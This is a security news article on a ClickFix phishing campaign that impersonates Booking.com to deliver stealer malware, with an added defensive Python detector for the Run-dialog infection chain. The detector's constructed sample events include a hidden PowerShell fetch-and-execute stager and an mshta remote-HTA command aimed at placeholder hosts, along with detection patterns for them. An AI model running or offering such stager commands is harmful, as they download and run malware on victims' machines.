Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails


Microsoft has shed light on an ongoing phishing campaign that targets the hospitality sector by impersonating the online travel agency Booking.com and using an increasingly popular social engineering technique called ClickFix to deliver credential-stealing malware.

The activity, the tech giant said, started in December 2024 and operates with the end goal of conducting financial fraud and theft. Microsoft attributes the campaign to a threat actor it tracks as Storm-1865.

“This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency,” Microsoft said in a report shared with The Hacker News.

The ClickFix technique has become widespread in recent months. It tricks users into executing malware under the guise of fixing a supposed (i.e., non-existent) error: the victim copies, pastes, and runs deceptive instructions that set off the infection chain. It was first detected in the wild in October 2023.

The attack sequence starts with Storm-1865 sending the target an email about a negative review purportedly left by a guest on Booking.com and asking them for their “feedback.” The message embeds either a link or a PDF attachment containing one, which appears to direct the recipient to the booking site.

However, in reality, clicking on it leads the victim to a fake CAPTCHA verification page overlaid on a “subtly visible background designed to mimic a legitimate Booking.com page.” The idea is to lend a false sense of security and increase the likelihood of a successful compromise.

“The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload,” Microsoft said. “This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard.”

The pasted command, in a nutshell, abuses the legitimate, Microsoft-signed mshta.exe binary (the Microsoft HTML Application host) to drop the next-stage payload, which in this campaign has included commodity malware families such as XWorm, Lumma Stealer, VenomRAT, AsyncRAT, DanaBot, and NetSupport RAT.
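The execution chain described above (Win+R, paste, run a LOLBin such as mshta.exe against a remote URL) leaves a distinctive process-creation footprint: the Run dialog is hosted by explorer.exe, so the first stage appears as a child of explorer.exe with a URL on its command line. The following is an added example, not code from Microsoft's or Group-IB's reports, showing how a defender might score process-creation telemetry for that pattern. The event fields mimic Sysmon Event ID 1, the sample events are constructed, and the binary list, regexes and score weights are assumptions chosen for illustration.

```python
# Added example: triage process-creation events for the ClickFix chain
# (LOLBin launched from the Run dialog with a remote URL). Event records
# are constructed to look like Sysmon Event ID 1; scoring is an assumption.
import re
from dataclasses import dataclass, field
from typing import List

# LOLBins that ClickFix lures commonly tell the victim to run from the Run box
# (mshta.exe in the Storm-1865 case). Assumed list, extend as needed.
LOLBINS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
    "certutil.exe", "rundll32.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe",
}

URL_RE = re.compile(r"\bhttps?://[^\s'\"]+", re.IGNORECASE)
# Flags typical of hidden or encoded PowerShell stagers.
PS_SUSPECT_RE = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-nop\b|-noprofile\b|iex\b|invoke-expression)"
)


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 fields used by this detection."""
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Finding:
    """Assign a heuristic score; 0 means the event is not of interest."""
    f = Finding(ev, 0)
    child = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line

    if child not in LOLBINS:
        return f  # only LOLBin launches are considered

    # Run-dialog launches are children of explorer.exe. On its own this is weak
    # (double-clicking a shortcut looks the same), hence the URL checks below.
    if parent == "explorer.exe":
        f.score += 2
        f.reasons.append("LOLBin launched from explorer.exe (Run dialog / shell)")
    if URL_RE.search(cmd):
        f.score += 3
        f.reasons.append("command line contains a remote URL")
    if child == "mshta.exe" and URL_RE.search(cmd):
        f.score += 2
        f.reasons.append("mshta.exe pointed at a remote HTA/script")
    if PS_SUSPECT_RE.search(cmd):
        f.score += 2
        f.reasons.append("hidden/encoded PowerShell stager flags")
    return f


def triage(events, threshold: int = 5):
    """Return findings at or above threshold, highest score first."""
    hits = [score_event(e) for e in events]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


# Constructed sample telemetry (not real events; hostnames are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r"mshta.exe https://example.invalid/captcha/verify.hta"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 r'powershell -w hidden -nop -c "iex (iwr https://example.invalid/x)"'),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Vendor\installer.exe",
                 r"mshta.exe C:\Program Files\Vendor\setup.hta"),  # benign local HTA
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(h.score, _basename(h.event.image), "|", "; ".join(h.reasons))
```

Run against the constructed events, the two Run-dialog launches with remote URLs score 7 and are reported; the locally sourced HTA and notepad.exe score 0. For after-the-fact forensics on a suspected host, the Run dialog also records what was pasted under the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, which is worth collecting alongside the process telemetry.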

Redmond said it previously observed Storm-1865 targeting buyers using e-commerce platforms with phishing messages leading to fraudulent payment web pages. The incorporation of the ClickFix technique, therefore, illustrates a tactical evolution designed to slip past conventional security measures against phishing and malware.

“The threat actor that Microsoft tracks as Storm-1865 encapsulates a cluster of activity conducting phishing campaigns, leading to payment data theft and fraudulent charges,” it added.

“These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail.”

Storm-1865 represents just one of the many campaigns that have embraced ClickFix as a vector for malware distribution. Such is the effectiveness of this technique that even Russian and Iranian nation-state groups like APT28 and MuddyWater have adopted it to lure their victims.

“Notably, the method capitalizes on human behavior: by presenting a plausible ‘solution’ to a perceived problem, attackers shift the burden of execution onto the user, effectively sidestepping many automated defenses,” Group-IB said in an independent report published today.

One such campaign documented by the Singaporean cybersecurity company involves utilizing ClickFix to drop a downloader named SMOKESABER, which then serves as a conduit for Lumma Stealer. Other campaigns have leveraged malvertising, SEO poisoning, GitHub issues, and spamming forums or social media sites with links to ClickFix pages.

“The ClickFix technique marks an evolution in adversarial social engineering strategies, leveraging user trust and browser functionality for malware deployment,” Group-IB said. “The rapid adoption of this method by both cybercriminals and APT groups underscores its effectiveness and low technical barrier.”

Some of the other ClickFix campaigns that have been documented are listed below –

The diverse infection mechanisms of Lumma Stealer are further exemplified by the discovery of another campaign that uses bogus GitHub repositories featuring artificial intelligence (AI)-generated content to deliver the stealer via a loader referred to as SmartLoader.

“These malicious repositories are disguised as non-malicious tools, including game cheats, cracked software, and cryptocurrency utilities,” Trend Micro said in an analysis published earlier this week. “The campaign entices victims with promises of free or illicit unauthorized functionality, prompting them to download ZIP files (e.g., Release.zip, Software.zip).”

The operation serves to highlight how threat actors are abusing the trust associated with popular platforms like GitHub for malware propagation.

The findings come as Trustwave detailed an email phishing campaign that makes use of invoice-related decoys to distribute an updated version of another stealer malware called StrelaStealer, which is assessed to be operated by a single threat actor dubbed Hive0145.

“StrelaStealer samples include custom multi-layer obfuscation and code-flow flattening to complicate its analysis,” the company said. “It has been reported that the threat actor potentially developed a specialized crypter called ‘Stellar loader,’ specifically, to be used with the StrelaStealer.”
